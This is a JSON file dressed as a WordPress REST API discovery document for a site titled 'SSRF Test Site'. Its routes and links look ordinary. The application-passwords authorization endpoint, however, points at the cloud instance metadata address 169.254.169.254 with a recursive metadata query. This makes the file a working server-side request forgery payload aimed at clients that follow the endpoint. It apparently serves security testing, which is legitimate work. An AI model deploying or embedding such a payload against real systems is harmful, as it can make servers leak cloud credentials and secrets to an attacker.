{
  "name": "SSRF Test Site",
  "description": "WordPress Site",
  "url": "https://flex.pandalf.net",
  "home": "https://flex.pandalf.net",
  "gmt_offset": 0,
  "timezone_string": "UTC",
  "namespaces": [
    "wp/v2",
    "wp/v1",
    "oembed/1.0"
  ],
  "authentication": {
    "application-passwords": {
      "endpoints": {
        "authorization": "http://169.254.169.254/computeMetadata/v1/?recursive=true"
      }
    }
  },
  "routes": {
    "/": {
      "methods": [
        "GET"
      ],
      "endpoints": [
        {
          "methods": [
            "GET"
          ]
        }
      ]
    },
    "/wp/v2": {
      "methods": [
        "GET"
      ]
    },
    "/wp/v2/posts": {
      "methods": [
        "GET",
        "POST"
      ]
    },
    "/wp/v2/pages": {
      "methods": [
        "GET",
        "POST"
      ]
    },
    "/wp/v2/media": {
      "methods": [
        "GET",
        "POST"
      ]
    },
    "/wp/v2/users": {
      "methods": [
        "GET"
      ]
    },
    "/wp/v2/categories": {
      "methods": [
        "GET"
      ]
    },
    "/wp/v2/tags": {
      "methods": [
        "GET"
      ]
    }
  },
  "_links": {
    "help": [
      {
        "href": "https://developer.wordpress.org/rest-api/"
      }
    ]
  }
}